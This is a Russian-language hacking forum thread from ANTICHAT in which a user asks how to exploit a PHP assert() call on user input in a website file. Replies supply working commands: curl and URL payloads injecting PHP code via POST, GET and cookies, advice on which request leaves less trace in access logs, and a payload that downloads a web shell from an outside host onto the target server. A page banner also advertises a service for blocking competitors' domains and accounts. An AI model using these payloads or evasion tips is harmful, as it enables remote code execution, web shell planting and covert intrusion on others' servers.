УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
PHP assert

Опции темы

Поиск в этой теме

Опции просмотра

25.04.2016, 15:11

marynli

Guest

Сообщений: n/a

Провел на форуме:
9630

Репутация: 0

Допустим в php файле на сайте есть строка вида:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]123123123[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).

Как можно написать PHP скрипт чтобы использовать данную уязвимость ?

Какой код лучше заливать?

25.04.2016, 15:17

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от marynli

marynli said:
↑
Допустим в php файле на сайте есть строка вида:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]123123123[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).
Как можно написать PHP скрипт чтобы использовать данную уязвимость ?
Какой код лучше заливать?

в параметр 123123123 пишешь пхп код, он выполняется

curl 'http://site.ru/' --data '123123123=phpinfo();'

25.04.2016, 18:40

strelok20094

Guest

Сообщений: n/a

Провел на форуме:
24770

Репутация: 2

site.com/yourfile.php?123123123=phpinfo();

25.04.2016, 18:49

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от strelok20094

strelok20094 said:
↑
site.com/yourfile.php?123123123=phpinfo();

get палевно

25.04.2016, 18:52

strelok20094

Guest

Сообщений: n/a

Провел на форуме:
24770

Репутация: 2

Цитата:

Сообщение от t0ma5

t0ma5 said:
↑
get палевно

а пост беспалевно? вот тебе выдерка из access log

xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44

25.04.2016, 19:02

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от strelok20094

strelok20094 said:
↑
а пост беспалевно? вот тебе выдерка из access log
xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44

вот тебе выдержка из access log

xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "GET /yourfile.php?123123123=phpinfo(); HTTP/1.1" 200 44

сам ответь что беспалевней

25.04.2016, 19:08

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

если уж на то пошло то я бы через куки слал

curl 'http://site.ru' -H 'Cookie: '123123123=phpinfo()'

29.04.2016, 17:02

marynli

Guest

Сообщений: n/a

Провел на форуме:
9630

Репутация: 0

А как запихать туда веб шелл?

29.04.2016, 17:14

private_static

Guest

Сообщений: n/a

Провел на форуме:
25535

Репутация: 22

Цитата:

Сообщение от marynli

marynli said:
↑
А как запихать туда веб шелл?

Код:

Code:
site.com/file.php?123123123=copy("http://mysite.com/shell.txt","shell.php");

зальётся по пути site.com/shell.php

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход